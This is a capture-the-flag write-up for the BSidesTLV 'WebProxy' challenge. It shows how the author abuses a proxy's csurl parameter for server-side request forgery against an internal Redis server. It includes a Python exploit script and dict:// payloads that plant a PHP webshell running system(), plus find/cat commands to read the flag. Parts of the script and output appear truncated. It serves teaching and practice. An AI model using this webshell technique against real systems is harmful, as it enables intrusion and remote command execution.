- Category: Web
- 300 Points
- Solved by the JCTF Team
We visit the attached website, and as expected, see the proxied webpage.
Let's see what else we can find by changing the csurl
parameter to something a bit more interesting:
root@kali:/media/sf_CTFs/bsidestlv/WebProxy# curl https://webproxy.ctf.bsidestlv.com/?csurl=
As a response, we get a table with the following content:
Service name: | IP Address: | Port: |
Redis | | 6379 |
NGINX + PHP | | 80 |
NGINX + PHP | | 80 |
So, we have a Redis DB and a PHP server on the same IP!
Before we continue to the Redis server, let's take a look at what the PHP server is serving:
root@kali:/media/sf_CTFs/bsidestlv/WebProxy# curl https://webproxy.ctf.bsidestlv.com/?csurl=
<!DOCTYPE html>
<h1>Im removing my files every 10 seconds!!</h1>
Well, that's good to know. Makes perfect sense.
Now, back to Redis. It turns out that Redis is very forgiving when it comes to accepting commands: Redis is able to ignore a good amount of "noise" and successfully execute the commands hiding inside. In our case, the "noise" is an HTTP request.
PayloadAllTheThings has a great recipe for exploiting this:
# Getting a webshell
url=dict://"<\x3Fphp system($_GET[0])\x3F>"
So basically the plan is to use the recipe above to create a webshell, and then use it to find the flag.
Here's the script:
import requests
IP_ADDR = ""
SHELL_NAME = 'shell.php'
def send_to_proxy(csurl):
print(f"Sending request to: '{csurl}'")
cookies = cookies = {'BSidesTLV': '34aa0da142bb608e2be8d1b644c25bffe6fad5a5'}
r = requests.get(f"https://webproxy.ctf.bsidestlv.com/?csurl={csurl}", cookies = cookies)
return r.text
commands = [
r'CONFIG SET dir /var/www/html',
r'CONFIG SET dbfilename {}'.format(SHELL_NAME),
r'SET mykey "<\x3Fphp echo \"\\n\"; system($_GET[\'command\']); exit;\x3F>"',
for command in commands:
csurl = f"dict://{IP_ADDR}:6379/{command}"
print(send_to_proxy(f"http://{IP_ADDR}:80/{SHELL_NAME}?command=cat $(find / -name flag.txt)"))
root@kali:/media/sf_CTFs/bsidestlv/WebProxy# python3 solve.py
Sending request to: 'dict:// SET dir /var/www/html'
Sending request to: 'dict:// SET dbfilename shell.php'
Sending request to: 'dict:// mykey2 "<\x3Fphp echo \"\\n\"; system($_GET[\'command\']); exit;\x3F>"'
Sending request to: 'dict://'
Sending request to: ' $(find / -name flag.txt)'
REDIS0006 mykey